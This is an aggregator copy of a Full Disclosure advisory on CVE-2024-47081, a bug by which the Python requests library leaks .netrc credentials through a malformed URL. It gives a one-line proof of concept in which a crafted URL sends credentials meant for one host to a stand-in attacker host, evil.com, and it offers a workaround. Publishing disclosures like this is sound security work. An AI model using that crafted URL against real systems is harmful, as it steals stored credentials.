CVE-2024-47081: Netrc credential leak in PSF requests library

3 weeks ago 1
fulldisclosure logo

Full Disclosure mailing list archives

From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/&apos;) Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245 The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue. As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • CVE-2024-47081: Netrc credential leak in PSF requests library Juho Forsén via Fulldisclosure (Jun 03)
Read Entire Article
  1. Homepage
  2. Technology
  3. CVE-2024-47081: Netrc credential leak in PSF requests library

Related

How to Write Compelling Release Announcements

How to Write Compelling Release Announcements

3 days ago 2
Framework Laptop 12 press reviews are live and Framework Laptop 13 in-stock

Framework Laptop 12 press reviews are live and Framework Lap...

3 days ago 2
Is Lovable getting monetization wrong?

Is Lovable getting monetization wrong?

3 days ago 2

Trending

1. tour de france
2. when does wimbledon 2025 start
3. michael bay
4. tribune review
5. valerie bertinelli
6. emma raducanu
7. azealia banks
8. nebula award
9. notre dame football
10. mount rushmore

Popular

Mozilla Patches Critical Firefox Bug Similar to Chrome’s Recent Zero-Day Vulnerability

Mozilla Patches Critical Firefox Bug Similar to Chrome’s Rec...

3 months ago 95
Greenland, Denmark Push Back on Vance’s Visit

Greenland, Denmark Push Back on Vance’s Visit

3 months ago 29
Making the District of Columbia Safe and Beautiful

Making the District of Columbia Safe and Beautiful

2 months ago 29
It’s Clearer Than Ever What Jeff Bezos Wants With the Washington Post

It’s Clearer Than Ever What Jeff Bezos Wants With the Washin...

3 months ago 26
Jargonic: Industry-Tunable ASR Model

Jargonic: Industry-Tunable ASR Model

2 months ago 25
English (US) English (US) ·
About Us · Contact Us · Terms & Conditions ·

© The Conrad Group Newsdesk 2025. All rights are reserved